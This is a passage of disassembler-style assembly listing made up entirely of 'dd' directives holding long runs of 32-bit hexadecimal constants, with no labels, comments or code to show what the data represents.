		dd 0C3E8172h, 0D2578D9Eh, 0BF32427Ch, 11968157h, 56FDAA8h
		dd 73758E83h, 0EF324411h, 0C501FD0h, 10DF0EF8h,	0C82EDDC0h
		dd 0AB9E517h, 15100FF3h, 27D1C86Ah, 0D71FFCECh,	226E8473h
		dd 2824086Fh, 10270C01h, 17C461FBh, 0D92D33D3h,	0AA632FC5h
		dd 8324F85h, 0A245597Dh, 655F1FBEh, 95AF788Ch, 1E8C063Eh
		dd 3B9A08B7h, 4E18C505h, 18CA87B1h, 0A701567Eh,	5D24FE67h
		dd 2DE4A1B1h, 3D79085h,	8E4CB45Dh, 0F69FFF75h, 0AE22FB6Ch
		dd 87EB822Bh, 4596B57Fh, 36D59F2Ch, 4C2F8BC0h, 0D2F3B13Bh
		dd 0CAE983EEh, 1B4553A6h, 0A4A6DDD1h, 8FF8F228h, 880DCC08h
		dd 0AB5371Fh, 75EEA300h, 8EC030F7h, 4FF08455h, 43FB1A37h
		dd 829AF46Dh, 231007C7h, 92EEBA9h, 142819D4h, 0C9020254h
		dd 0FED048C5h, 1C2B0285h, 7ADADC5Fh, 0C9D917DCh, 0C8E058AEh
		dd 6980FC75h, 8CE52D49h, 4145BA43h, 625D30BEh, 0B1B4C498h
		dd 0D1CA813h, 5AD8BE7Ah, 715DACD5h, 20600222h, 834EFC5Dh
		dd 0BCB438Ah, 0EE28A0BDh, 0A6461223h, 98B188BFh, 0BD9FF2FFh
		dd 154D564Ah, 6EE7D0D0h, 0FB554698h, 0EAFA803Dh, 85FF2C8Ah
		dd 0B5DCDA49h, 0DFED8339h, 0FD0D5989h, 0D1827FC5h, 90DB2ACDh
		dd 0DD7F7E91h, 31AC0255h, 0B043C6D7h, 6D554620h, 4F1B17F6h
		dd 1475CBA4h, 26D67DF0h, 904F5007h, 84DEE5FBh, 68405E31h
		dd 514AA732h, 0AAFF71B9h, 9F6EA91Ah, 0C2C72945h, 0B4B54D6Fh
		dd 0AA654AAh, 271070A3h, 81DD776Eh, 0B772F80Ah,	0FC7C39DFh
		dd 0A1B0A7E1h, 0E67E537Ch, 757FC690h, 0FF353FC9h, 277B4862h
		dd 1C463A86h, 0FA50D004h, 18D077A9h, 52B4CC52h,	52B429FCh
		dd 9B154052h, 414A500Dh, 2D80AF0Bh, 70B471D4h, 2FB85A60h
		dd 0D9F9118Ah, 43AC9955h, 461673B0h, 6101202Fh,	3D01929Eh
		dd 0A60865A6h, 214C33ACh, 4C56C0D4h, 5396CE0Ch,	14698843h
		dd 0FB9AD58Bh, 0B99F659Dh, 21882E94h, 0AF50D870h, 0DC219BC9h
		dd 8451A57h, 7A07E5F7h
		dd 441A18B1h, 9984C6B4h, 0E0789787h, 909854ACh,	0ECCACA7Dh
		dd 0EF51DD76h, 0ABAB988Ah, 5C8498D3h, 9AC42405h, 980B3929h
		dd 784D35A6h, 76513C08h, 0ECEA0C99h, 79B16584h,	0AC9D228Bh
		dd 174E6060h, 0FD844CACh, 0B7880EA5h, 575A80Ah,	0BFA96F4Dh
		dd 0E84BFC44h, 5377C651h, 7EA41E7h, 72372B52h, 721AC821h
		dd 489D73D4h, 0FA6F86B1h, 0B98D6AC9h, 5D85192h,	50BC29A7h
		dd 0A229F500h, 0B4281BB9h, 0DFC8BDEh, 44749591h, 0FECEA0AEh
		dd 1C415092h, 0A29CEF37h, 0EEE5E64Eh, 0A1C06AEDh, 5A2FFCDAh
		dd 0AE8AE430h, 8BFBF84Ah, 0C95AE915h, 17862328h, 0C5F36EF7h
		dd 46122E94h, 52E899E4h, 5EDE576Eh, 1990658Ch, 2B0CDDDh
		dd 0AC5D726h, 0F0CCB4Ah, 8384E58Dh, 41F43490h, 0A8E4617Fh
		dd 30BF8E31h, 0B5A74101h, 0A09B24C6h, 56168BDAh, 245FF943h
		dd 155CD58Dh, 869D71EDh, 79BBCF51h, 8C668107h, 823FA7A2h
		dd 0C4863DC7h, 5F8C0CE8h, 7FA9A565h, 2CBBE830h,	0B315746Fh
		dd 70942A05h, 16EF5A31h, 25887828h, 8AD418B5h, 0F66BE471h
		dd 0BA29F3B2h, 0FA2311DEh, 9848A11Bh, 71571BAAh, 8853124Ah
		dd 3F3D1A8Bh, 0AD1AC231h, 33335EEDh, 0A555A766h, 38C6FB0Bh
		dd 88806AA9h, 7F695B67h, 0E6D8E551h, 0FCB07315h, 0CB06AC0h
		dd 0E1383E75h, 0D4B330F7h, 0A03CA3Ch, 0E1A15A29h, 0FCAD795Fh
		dd 80DA4C4Ch, 96791DE2h, 0A6101E47h, 3D545405h,	0E05F2A82h
		dd 0C02C4462h, 4A64F28Bh, 2CAA60EFh, 0C08114A0h, 1C42CF03h
		dd 8C8B8901h, 0F2EB8252h, 1FDA5584h, 5C44381Bh,	98A10309h
		dd 0FE9063DDh, 0D39F58F2h, 8BB9C22Ah, 0AE06323Dh, 0D9F58C9Ah
		dd 415A2F6Ah, 44EA83E3h, 0A20DCAC8h, 6A311CBFh,	0E0D4D4E4h
		dd 1C9624E6h, 0D7F95B1h, 630B8B03h, 5911DEB9h, 0F09B005Ch
		dd 0C2505E95h, 1C6C68EFh, 9C3E9BD2h, 465B2415h,	394B502Ah
		dd 70C6594Dh, 94CAC22h,	1482535Dh, 0DF2ECAE0h, 41219146h
		dd 0C42F907Bh, 0F163BD62h, 5C166C65h, 4730C6CFh, 3E0A16A5h
		dd 4753DEF3h, 370F27F9h, 0F7E9F346h, 0A6D4B193h, 98CA794Dh
		dd 832F1998h, 6AC4830Dh, 61ED0CA3h, 68D3992Ah, 0F3A3D17Dh
		dd 0E2E9BFBDh, 0FD3FB080h, 0C7FEBF85h, 1C0DC595h, 4D9CDC45h
		dd 69D452Ch, 0A95D7B1Ah, 0DFF5F9FDh, 7472F7B0h,	20842FC1h
		dd 6273A610h, 7D5DE006h, 0C26DBF40h, 81DD134Eh,	52139B84h
		dd 0BC9692FCh, 0CF64E12h, 4DAA009Ch, 0BA228F24h, 0A00C9E38h
		dd 0E5563CDh, 0B3EB3FD7h, 9426A293h, 497FF2CCh,	0D5ED064Ch
		dd 396F800Ch, 4D8A1E8Bh, 466753Dh, 0D1EC638Ch, 8174679Ah
		dd 0DAA889ACh, 58940416h, 53EE0AE1h, 8A06457Eh,	8F8154E5h
		dd 7A28BF47h, 0EC081E37h, 44CD41F9h, 7FE2554h, 7DCF26F2h
		dd 29C3A5DDh, 253238E4h, 656C3EC0h, 0A3867F8Fh,	0ABC0093Ah
		dd 0E1F972A2h, 648CC0CAh, 5A9D2B02h, 0DA2D832h,	0BA18A62Ah
		dd 3C4DF4Ch, 0EA892AFh,	8D621EEBh, 55A130A8h, 63509AF8h
		dd 0CC778BD4h, 5378E8B8h, 46944116h, 51B698F3h,	7CD1C052h
		dd 0F07FCE30h, 0EB041235h, 0F5EC96E2h, 3AD6288h, 87EF1826h
		dd 0A0FD930Eh, 0DF89E8D0h, 836B3CAFh, 0EDAF3006h, 4296FF51h
		dd 32E07808h, 8A1E6E3Bh, 0A53826AEh, 0A2185998h, 71C5495Ah
		dd 378DD05Fh, 62D849E3h, 6E3475D0h, 0D4D2C066h,	0AFD2BA5Ah
		dd 0C5E3AF46h, 1D1F7282h, 40CA29A5h, 406DDA67h,	0F1F4732Bh
		dd 2E373182h, 71F55147h, 7CC942BFh, 3A046A31h, 0A6F3A36h
		dd 0E31C5298h, 77312268h, 0EA9D60D7h, 17F6B7DEh, 2AFAFB74h
		dd 35665A80h, 98EC21F5h, 671402DAh, 0CB866E12h,	40DDC80h
		dd 2163B903h, 17DE231h,	0AA60DAEEh, 9BC6C321h, 759EF008h
		dd 0BE8222F3h, 52AE5353h, 1F4E23AAh, 68BF40A2h,	19432247h
		dd 385C4B54h, 73958F8Eh, 0D039A8B2h, 2B9AC82Fh,	0DE2377ACh
		dd 9DCDA02Eh, 4A8C31B0h, 0D2E7DC41h, 2253D531h,	8E9C4377h
		dd 9E69EA59h, 54C5AFBFh, 0F402A185h, 0EE73B58Eh, 72301EE0h
		dd 0FC4D18F4h, 0B392DCDDh, 52A01774h, 149220D3h, 5F5B127Ch
		dd 6D0D2FA2h, 0ADEA5414h, 159C0FDEh, 1AE61B3Eh,	69131986h
		dd 67595593h, 18865FFAh, 2A607FE2h, 85D82800h, 51F3FC9Fh
		dd 16680BB7h, 8910B3D7h, 902FBAFFh, 6FF008F3h, 0DF76BE47h
		dd 0D51B8360h, 4BA589AEh, 0F8DB5D21h, 5A2A8B9Ah, 894E06CAh
		dd 55091C37h, 1CC8F5EFh, 9AF30E62h, 0A354A1FFh,	0BB2324Bh
		dd 12E47F22h, 0EEF0ED4Dh, 0A5EEF0DFh, 3577AE5Ah, 0B89EBC07h
		dd 0B1BEA1h, 631C7DCh, 81E37672h, 0E7D8ABBh, 0A9AFC62Ah
		dd 0B1A46DD8h, 5AB0FDFFh, 0F2476332h, 2EB883BBh, 34385D69h
		dd 0BA2A930Ah, 0ABA26BF6h, 0F94E6C06h, 5842A715h, 1D5FEF15h
		dd 731FA432h, 0B29CE60Eh, 4C303F5Ah, 0C810395Fh, 0A6643110h
		dd 0D21B677Dh, 2E27E8CDh, 0FA441983h, 2341E38Ch, 4260662Ah
		dd 8E721FB3h, 0E8F84FA2h, 768192D2h, 54158604h,	0CFE26A81h
		dd 257BF43Dh, 4A01E8D2h, 0C9163ECFh, 19AFEDA2h,	57E250E1h
		dd 9093FC4h, 29967716h,	9BF4C8DEh, 0C589AC62h, 0B4096980h
		dd 0C8B4E60Ch, 29018C59h, 72C23344h, 337322C8h,	0B4D8B30Fh
		dd 9A1E57AAh, 0B35F5598h, 8195EFDAh, 4C4B5F5Ah,	32AEFB39h
		dd 0B451554h, 6AC70351h, 0AD213070h, 0FAAF266Ah, 2AA6D5D9h
		dd 199BDE62h, 8D070859h, 0FF0D01BBh, 1168172Ah,	9497A0C2h
		dd 8EAAA45h, 0A1D85202h, 0A968EB27h, 0F82B1DD3h, 8BBBAC02h
		dd 0D37AB104h, 5551B45h, 304F0391h, 15C8B678h, 0E704456Dh
		dd 3FC6B383h, 9DE275D3h, 0D755A040h, 4F9AB0AFh,	3486DA55h
		dd 4A4A3435h, 57FE3977h, 46778B68h, 7FE1284Ch, 4A0E4065h
		dd 39F52901h, 18619C65h, 582C9588h, 604569C6h, 15036A29h
		dd 0BB65AEE8h, 6814EE3Ch, 80D4902Ch, 0B376BE4Dh, 1431A942h
		dd 2802C680h, 2BB88A62h, 50D11804h, 9F2A4297h, 0B744676Ch
		dd 7C30AC64h, 6FE3659h,	75590F19h, 764C4115h, 24042747h
		dd 0D988D2D1h, 4471162Bh, 0D96018Ah, 80275750h,	0B4D05A65h
		dd 0CF4D1504h, 2D133056h, 6182F54h, 6A1E0121h, 2EC23B08h
		dd 0B4C04488h, 0CE6216C0h, 4515E0C0h, 0D206E6AFh, 0D4EB4DCCh
		dd 0A304B637h, 1E6830D5h, 0D1B1740Dh, 237BC6DBh, 2AEB77DCh
		dd 0E18176C2h, 62EF931Dh, 6EA5A5C7h, 0A3DA475Ch, 769DE85Eh
		dd 8997A5F5h, 0C3255949h, 2AF0CD58h, 0FFD5888Fh, 3A196B6Bh
		dd 5D0A36D8h, 7AB388Fh,	4F17602Fh, 0BDA085E6h, 8E3CA721h
		dd 0CD8BB611h, 0B42D85A0h, 5CF31CEh, 0D1D811CAh, 8305D9Ah
		dd 13D2C9B5h, 4BD86F5Eh, 9E9388Fh, 0E9F031B2h, 1C191472h
		dd 19251698h, 6794843Ah, 0AFF47C72h, 0C28B0C75h, 0A845F7Ah
		dd 0C434E2FFh, 0B46617Dh, 6AEA93D1h, 396B8064h,	61799D77h
		dd 0E1942D0Ch, 166568E4h, 0EB556981h, 2D50A6DAh, 80AA598Eh
		dd 6018300Ch, 0F078B5BCh, 82157997h, 0E9716751h, 537A8B72h
		dd 0F03A6514h, 2058012Bh, 0B94538C6h, 8441D2CAh, 9ADD61FDh
		dd 9C0043D4h, 755C0235h, 0F0A2DB56h, 2735FCF6h,	0FC2E994Ah
		dd 1A4BD3D0h, 64A80577h, 2B2F18ACh, 82E8B301h, 0B410B611h
		dd 0D7391C41h, 0A31D9F73h, 84D79EBAh, 59755E99h, 66A30111h
		dd 0DF071B6Bh, 2D1D161h, 12CD7581h, 75EDA815h, 71519ACDh
		dd 98191C66h, 71AEAEB5h, 0A8A2E6BBh, 72CCBF9Bh,	2FD6EFCh
		dd 0CF236F63h, 6785FC22h, 9D56F325h, 730ACC0Bh,	22C88BDEh
		dd 0C795960h, 3C303C32h
		dd 65FD4559h, 8E079505h, 8D7805CFh, 0B63F0A54h,	0A6E4A1Fh
		dd 44C09701h, 0AA29595Dh, 59F2025Ch, 15109446h,	980C1912h
		dd 43F06141h, 175D0922h, 0D550BFB7h, 0B2266561h, 28C5015Ch
		dd 8AAA5513h, 0CBE431E4h, 93D7A8F8h, 306004E4h,	31162B33h
		dd 4178B55Ah, 2B374569h, 682328BDh, 0F143ED59h,	9571706h
		dd 0D516DBB0h, 0D273F178h, 4515D959h, 0D6FC510Ch, 77FF3341h
		dd 2EF6883Dh, 290725FEh, 3F418F45h, 0B321A198h,	0C03D2884h
		dd 5CC94F70h, 0D1517095h, 0ABB89363h, 556D0A2Bh, 224C6B15h
		dd 376DFC82h, 6DEDFDA7h, 0BE6FC2CAh, 0DB7573Dh,	0C5DA2918h
		dd 255DADB0h, 0C32A5AE9h, 0D5665AFFh, 30D0CDBAh, 7755F05Ah
		dd 0CE2AFA37h, 0A7BC5A6Fh, 252B80FCh, 88C8A2DAh, 0D9E2E0A1h
		dd 838909F2h, 499A9A35h, 744F6CFDh, 0DDF26E3h, 594B859h
		dd 16A6A3CEh, 905F522Dh, 0AB08F69h, 0C11F8212h,	72D52Fh
		dd 5884977h, 0DA3D2A91h, 0F826072Ch, 860B1D5h, 0E8ED52E9h
		dd 432358F5h, 1247509Bh, 23248B1h, 75EE1813h, 3024588Dh
		dd 0CE5DB3BCh, 0D4639304h, 0DAEA0345h, 0AA86F65Dh, 0C8D2962Ah
		dd 0FC178788h, 0CDF91C8Eh, 2629DC13h, 0D0D91BFBh, 30ECF636h
		dd 0BE5C469h, 0F2F44930h, 9085C15Ah, 0B61314B6h, 0AE9DF228h
		dd 790C06F2h, 0C17C5C23h, 49C039Dh, 0BC0C8424h,	8019C5DBh
		dd 80155D7Ah, 0FAA6BC43h, 0B6D99D05h, 0AB954F60h, 81BA98B2h
		dd 69F46623h, 82B57D80h, 0E7B2E10Ah, 1B7BE211h,	4190AE44h
		dd 0F40A86C9h, 0F9E6FC3Eh, 0A4A784B6h, 820BC34Bh, 28EB173Dh
		dd 3A7D6FAEh, 28223660h, 12061260h, 377D0B22h, 5C6CEA06h
		dd 1B1A686Ch, 4E75075Dh, 45F853CEh, 0A557514Ch,	0CFB5842Eh
		dd 68E0FE0Ch, 8CB9D227h, 64556619h, 0D95D3BF8h,	7C787E1Fh
		dd 0EABC9619h, 7A0BD1D5h, 57A8E1E8h, 198542B4h,	0ED589636h
		dd 0C132EC00h, 0D0184309h, 0F93FA054h, 0FFD3FA9Ch, 0CBA8A360h
		dd 0A8467C49h, 0C087747Dh, 6A1BFF46h, 0B83FA47Eh, 0AF1945D1h
		dd 0A9BE8832h, 0A3208D14h, 0F7BBF708h, 301C759Dh, 0D644A4B2h
		dd 7A6F5657h, 77ADE5FEh, 0B4608311h, 9B0AC540h,	0B01C2A2Ch
		dd 0CA07E856h, 47B8C421h, 0ADCCC547h, 73C016F5h, 23710662h
		dd 0D34759E0h, 3E621303h, 1B74C804h, 0C98B4BEFh, 0BE211D5h
		dd 295A198h, 0BC81A76Ah, 0B81659CEh, 23B93AE7h,	0FD1BB501h
		dd 8CB19F0Ah, 2498262Fh, 0B330FE5Bh, 91CBCC0Fh,	74C745C8h
		dd 8BEC82AEh, 632872A1h, 5A02F1C0h, 3333CE73h, 698AD6A7h
		dd 106B5761h, 56895F7Ch, 0A351A977h, 48B80B95h,	14F4176Ah
		dd 1022024Ch, 0AC0498BAh, 1AC0E319h, 2254EAE8h,	8C7752D8h
		dd 444A02CAh, 72956889h, 0C224087Ah, 7889692Dh,	8D02C53Bh
		dd 4BB82444h, 203547B0h, 0C9EE0891h, 14C707C8h,	71B42224h
		dd 0AB962007h, 12583FFBh, 714DA643h, 21932572h,	0F5AABE62h
		dd 0DF8054Dh, 0C0716A2Ah, 0AE65ABADh, 8F84A73Ah, 0BEA0FC02h
		dd 45A306BCh, 525F3809h, 0CE9C9917h, 63557456h,	149CA9ABh
		dd 0A6085B11h, 2EA6085Ah, 2D1C064Dh, 0F56B991h,	6E0A4545h
		dd 0C6ADC5D3h, 0F8B7CA6Dh, 0BC8FA360h, 751D45DDh, 85A23F15h
		dd 6BD8DBD0h, 527A14BFh, 5DDFFAD7h, 58A2117h, 384C0B8Eh
		dd 0B75E3BEDh, 0F6A2F7A8h, 2671E016h, 0D4712A17h, 5086889Ah
		dd 20521F9Eh, 2AB522E6h, 57E2BEF0h, 0B15746ACh,	0CC45AF8Ch
		dd 0A951BA56h, 0EBA2B01Fh, 493888Ch, 8A32560Ah,	0E9E8F670h
		dd 5177BE35h, 717728C5h, 43DDBA4Fh, 62F3DFE0h, 493E6254h
		dd 0F153E237h, 717524D7h, 5A19303Dh, 8B42BA12h,	0A8C9B0D4h
		dd 69703160h, 0E71B5947h, 1C2160EEh, 2C9F5D79h,	9C41A192h
		dd 42CAA02Ch, 0B34DA1F9h, 4B9E9AFh, 63B744F2h, 0B1D4D26Ch
		dd 1FB86A9Bh, 998F1D5Bh, 2F8C88CBh, 764E7155h, 3029E22Eh
		dd 4B49714Ch, 1B0A2E71h, 0C64D1EB4h, 0E53D09CBh, 9B42E057h
		dd 20212C0Bh, 465102B9h, 2AC6111Bh, 9A94C013h, 51D91FD9h
		dd 0A4D0DA74h, 0CB4A290Eh, 185F3AADh, 7C2DAEDh,	980FAB03h
		dd 488CB0D4h, 1C3C5521h, 0C712062Ah, 1D0831Bh, 94C3A4D3h
		dd 6D1E61F9h, 2ABE5816h, 0BE62C605h, 0A98A05DFh, 50F86094h
		dd 0ABDACC67h, 1AA4594h, 65B5AF94h, 0A059D545h,	5C518356h
		dd 0F3D58E54h, 28F13F8h, 0FB3FF5C2h, 91987E15h,	0B13943E2h
		dd 28CC64D9h, 9DC4DCA2h, 0DF00A006h, 0DC6FB1BBh, 2AB10CB4h
		dd 8BB994B9h, 0F6228757h, 0AA9E9604h, 0B29E8B9Bh, 0B615C3C8h
		dd 0A73B0EAh, 0AA5032B3h, 4BB1255h, 5C49C4EAh, 0ACF3089h
		dd 0BE31A78Bh, 8D32B0A2h, 0AAEF4AF3h, 447456B9h, 0D691723h
		dd 0DFE0ACCCh, 500EAC80h, 0C4EC8B83h, 0D03102Ah, 0E35FFDFAh
		dd 7699E017h, 0EB733F55h, 0F1C0478Fh, 0F5AFD991h, 1707F2FBh
		dd 6C9CC0C2h, 3C152551h, 8FAA7A8Eh, 827145BEh, 9BA4A310h
		dd 0CE8DBA51h, 70E7C2Ah, 14B746AAh, 0D199E250h,	498C007Ch
		dd 23F94817h, 10830E61h, 0EEB1626Eh, 0BE7A5C19h, 0F2484A28h
		dd 3CEAD469h, 0EDB9B95Eh, 755AE1B1h, 7AEA2318h,	28C34EC8h
		dd 0ADF07B30h, 8F511CBh, 223D1063h, 608FB129h, 510A5C4Ah
		dd 7712532Dh, 9E03F0D7h, 0A1EB6878h, 0E74F4B7Eh, 0BDFF543Dh
		dd 636C8E3Ah, 62BA6D4Ch, 844058Fh, 408F2A53h, 7323294Ah
		dd 13CCDDB7h, 18DE7EB8h, 6A79732Fh, 0E75D6A1Bh,	0C4E15BE6h
		dd 0C91A2994h, 0A89C6D0Bh, 8EAE4D55h, 16EA9A22h, 5D156746h
		dd 19E0DBE6h, 1304A747h, 6ACD37ACh, 238EBC37h, 0A819199Ch
		dd 0EAF3A87Ah, 31D5574Fh, 26ADD6E4h, 0D114EA01h, 3CC227F4h
		dd 0F5D47514h, 0B53EDC02h, 500C24A0h, 871FF30h,	0E2FB5812h
		dd 0CB23A402h, 0EA135605h, 7FF41098h, 0A9BEB4DFh, 4C0A8B3Ah
		dd 34393911h, 16D6FBA4h, 0D5D52B0Ch, 65EEEF5Eh,	89454DD1h
		dd 6542BB98h, 4222EEB9h, 6CC09EB4h, 0D8AEEEB0h,	2C3B9B9Bh
		dd 0C0B31BB0h, 14DA8C9Ah, 8EBABD9Eh, 522EB25Ch,	872910D5h
		dd 98628B3Ah, 3061504Bh, 0C7E64B8Ch, 0F50ED5CCh, 808C95A5h
		dd 37C3C37Dh, 0D5402F21h, 594B4A4Ah, 60D8B411h,	9A783486h
		dd 7CCABEC2h, 0E131A3C4h, 758E52F4h, 0BE09BC49h, 270229DEh
		dd 0DA409D5Ch, 0EE6F12ACh, 87C375D2h, 90385B37h, 4FF12AFh
		dd 5C585A8Dh, 0E224F597h, 0EDE8E07Eh, 0EAE976FBh, 431A43F2h
		dd 0D049CA2Fh, 0ADD0E07Ah, 0E30A8848h, 7D71055Eh, 0BD88A808h
		dd 287E687Dh, 0A78C7DF0h, 9C8C0CAFh, 4E248AECh,	0F0546A10h
		dd 95A01564h, 6F661DD1h, 0A8AA5854h, 8B0196B6h,	332CAC89h
		dd 0E5D1AA2Fh, 3290A4E2h, 89C3753Eh, 0D61B3ABBh, 331085E0h
		dd 323ECEBCh, 6EFDF4h, 0C0FC0218h, 14553DC8h, 0A359764Dh
		dd 152F1AB5h, 0DCF8185Eh, 0CC5E3A4h, 2527A580h,	96851D81h
		dd 50527F8Bh, 89044B44h, 181C2596h, 4B71BD7Fh, 0F6789EAFh
		dd 0EB54BEB8h, 0BA7B14CFh, 6A079144h, 5FC4711Ch, 0B9332A14h
		dd 0C1DF6D45h, 0DC89895Eh, 0D72E790Bh, 7057884Bh, 98395D68h
		dd 0AE9CD1E0h, 2F645033h, 5A13D0A2h, 7A2E15C9h,	4981D578h
		dd 812FF190h, 2B1CDD39h, 6D270142h, 0B8DA59D9h,	0E674AE73h
		dd 817B4144h, 14B89B83h, 0C7046D0Ch, 477E923Dh,	66F8ABA9h
		dd 74D479D6h, 0FBD7982Ah, 196F42BCh, 0F8F97A43h, 84B1B12Fh
		dd 0B8B49346h, 3A8FA274h, 761F2C85h, 458CE321h,	0D228501Bh
		dd 38C818Eh, 0FE783CFDh, 97DED332h, 323CA1C2h, 8B67E0FAh
		dd 0EBF31F4h, 0A09C09C2h
		dd 8882237h, 8155E70Bh,	0F64004A7h, 42F66474h, 0DA80BD70h
		dd 17D952FFh, 0CBAAE6FEh, 0A7DF0B1Dh, 0E07FEB06h, 3589B11Ah
		dd 3B529DA2h, 18873139h, 0CAE94D10h, 4BB2F498h,	0C0C6D765h
		dd 98660A2Eh, 0ABD8C41Dh, 4B6D7BFAh, 63A5AE1Ah,	0C47FC3BFh
		dd 0C519416Fh, 38CF677Ch, 0CD445D82h, 5567E9D5h, 0B4D88EEEh
		dd 381BEC80h, 0C3BE40FAh, 6979E968h, 176E2AE7h,	0B7EBA93Fh
		dd 2E465CCBh, 368EDABBh, 834AC591h, 1C4632A0h, 0DA41B224h
		dd 89FDC630h, 10AF1D9Eh, 0ECB5003Ah, 51F08481h,	24D639EAh
		dd 0F03B81D0h, 4458A9D0h, 23609EC2h, 0CB034081h, 0B48FC1C9h
		dd 7ADD7EC3h, 95068C32h, 0F664475h, 75A89164h, 0E1076A71h
		dd 2944E328h, 7452EB2h,	6BAB265Ch, 0CEA9BB6Ch, 3920D0D0h
		dd 0E620C702h, 9D4A8485h, 0F6D262EEh, 60891E0Fh, 488D8116h
		dd 44FD0183h, 162C75F4h, 451A7A1Fh, 7C1D7B1h, 4658301h
		dd 0C7DD128Dh, 0D3383875h, 0D4CF9DACh, 0D204A87Eh, 1DC5F224h
		dd 23558F6Ch, 0F3B2EEDEh, 0B15BDDC5h, 0C8E0311h, 246952AAh
		dd 2EA1180Dh, 446DDC58h, 3A78468h, 75D1A78h, 7DA473BBh
		dd 244C1C16h, 6802397Bh, 4472C006h, 54D00351h, 8D635A45h
		dd 651268Ch, 69929A0h, 45B430B8h, 79ACD25h, 0A27772A0h
		dd 0D2918749h, 19C910FCh, 0F8B35448h, 0A0B57A58h, 8CE50B0Dh
		dd 7699180Eh, 66414FD7h, 7997BA71h, 289359EFh, 8DCD4810h
		dd 2EF6DD82h, 0B60C4FBBh, 6664F491h, 8B51E1A9h,	61A31A81h
		dd 0A4EDE6E1h, 5BFFB080h, 1873A6D3h, 0CCE3A2E7h, 48E5616h
		dd 20621898h, 0AC989631h, 0A4A08A9Eh, 0FA8CEA9h, 3BE929BEh
		dd 3F053318h, 8E1B4824h, 0A9B9236Fh, 89A50365h,	0EC15408Ch
		dd 74DA8BC6h, 29D374F6h, 3AD9233Ah, 1256E123h, 7BBB7A49h
		dd 0D4C0AA88h, 449A6E12h, 0F7D40914h, 7BBC0F09h, 0D2DAB6Ch
		dd 0C6FB28Ah, 0E771467h, 0A369CA0h, 0DB295816h,	0E725C284h
		dd 885E3D4Ch, 6F1E03FAh, 73CE068Fh, 0D5EDD526h,	0CEFA400Eh
		dd 3D8D50BAh, 0F5E8CDh,	85B6DEE3h, 2509D63Ah, 784CF67Ch
		dd 0EADE9AC0h, 22450C6Ah, 589CF18Ch, 58CA52E7h,	0F3D0581h
		dd 5EB328F2h, 971418Ch,	0FB46B1DEh, 0C347E7C6h,	0A6B83E09h
		dd 875AA8EBh, 847B17C6h, 32308485h, 0D848D002h,	0FAE0CA0Ah
		dd 0B32E880Ch, 0DEF4AC41h, 98893631h, 60FE1832h, 348C603Bh
		dd 41AA619Dh, 1B35F20h,	2F03540Ah, 0D307E5A6h, 591BFE02h
		dd 654585A3h, 96A85B68h, 6023472Fh, 7A753EFFh, 0ACCCDB50h
		dd 0BC6ED9CFh, 0AEDA4020h, 77E51163h, 8C77A694h, 78B85864h
		dd 26B850D3h, 74862051h, 0C1CBC69Ch, 5645B159h,	0C192C8A6h
		dd 85DB168Ch, 68A93BFh,	91257733h, 0CC642E21h, 2BAD150Fh
		dd 0B05745ECh, 0D1C86895h, 29BF8824h, 0C1C0CDE2h, 0BE6B28D1h
		dd 27097551h, 4B2652EEh, 841DF468h, 0E506B68Eh,	31A5AC7h
		dd 0A3D8F4E6h, 57E9EB63h, 19CAFDC6h, 74B0ADB9h,	2035CABBh
		dd 0CE0110ECh, 96EBD68Ch, 683E57D0h, 2B1A626Dh,	9657DFD7h
		dd 96B62808h, 0CE495D94h, 0A77223CFh, 2EA2202Eh, 0C0930109h
		dd 75C564A3h, 626B32C9h, 61DACF5Ch, 0AAA347C1h,	5F45FE24h
		dd 364ABED3h, 4323408Ch, 100AB18Ah, 50602F6Ch, 28CE8D4h
		dd 888968A8h, 0AA88A112h, 4CA2AC45h, 44C29644h,	116C2D74h
		dd 91132266h, 6D11A226h, 9884388Bh, 89E43888h, 22DF5BA8h
		dd 246944D2h, 2D144448h, 28442C62h, 0D3848D25h,	9904D822h
		dd 4CEB4348h, 0AC614593h, 50024E63h, 25D9A68Fh,	1135B0FCh
		dd 6A46B7A0h, 57918067h, 0D524CA23h, 3519B308h,	8D3A6CE2h
		dd 234B1B10h, 88D246D2h, 823491B1h, 0E234246Dh,	0DECC5918h
		dd 10AA2927h, 0CD5DC810h, 0DA5F1ECCh, 0F1416475h, 9CAAE3EAh
		dd 0FE633AD3h, 3DD73E7h, 5C638DC6h, 0C9A546D1h,	0AC4D120Ah
		dd 17C3D206h, 0DB2B6C09h, 1E0FEAC4h, 0AF83350Ah, 13FB5824h
		dd 0D0C003E3h, 1082E07Fh, 0E82D7968h, 0D50F5A14h, 9C4A6D4Eh
		dd 4A6367C6h, 0A3211F48h, 0BFC39131h, 103330A8h, 774FD848h
		dd 7A50092Ch, 0DA0FB40Eh, 5891E7DCh, 41C808F8h,	10468A5h
		dd 0D072B4E3h, 42C66E02h, 92CC4E19h, 7E02CEC9h,	436AD34Fh
		dd 0E4C1EA7Ah, 31158101h, 3D8363AFh, 2198C924h,	62F09466h
		dd 0A84A1545h, 35AAB246h, 0BA518822h, 77E2710Eh, 0E2406D0Eh
		dd 99C59E52h, 5CCA9603h, 0AC494ED0h, 91049D5Dh,	0DF179301h
		dd 517C6104h, 0C3397C9Bh, 872C5851h, 4373E604h,	242FA05Bh
		dd 0DDE15096h, 0D1F42318h, 0E891563Eh, 706687D9h, 31031414h
		dd 0BE000542h, 0BFEB3F83h, 0C008CDCBh, 2C831779h, 629FBAF7h
		dd 7D2F978h, 258B475Fh,	1A1959ABh, 0D0A07D9Dh, 0BD2F3901h
		dd 4632FF2Fh, 56F2D54Bh, 0B31834A1h, 8232E9FCh,	0BCBB896Ah
		dd 0A19CF8Bh, 0B8BDDCF5h, 0C275AE9h, 1E4BB9D7h,	0A3F4B7C9h
		dd 4FF01ABFh, 47D12E3h,	93C78ADAh, 18348160h, 0ECA85A3Bh
		dd 0A1800D4Ch, 21D0024Ch, 0A0464A38h, 0D5871726h, 2F940F58h
		dd 6D50F5ABh, 40A9D8C4h, 0CAC26425h, 0CADA8C25h, 50CA32C6h
		dd 875948F6h, 0D194C4F3h, 0AA1652h, 27118D2Bh, 18CA9147h
		dd 963EC33h, 0EC62FAE9h, 0C8BA1B2Eh, 0B4E20A5Eh, 38178A5Ch
		dd 5B462EE7h, 0C9836780h, 2003C622h, 4B181069h,	0F3A1CCE3h
		dd 0C25F535Ah, 0B9A71993h, 3FCB84F5h, 60495F60h, 0A28DA26Ah
		dd 0D171ED1Fh, 0EFE99638h, 0AB860F4Ah, 18F8CAC5h, 9C4E53ADh
		dd 0D82A0831h, 583232ECh, 0AF77125Eh, 81999819h, 5AE452EFh
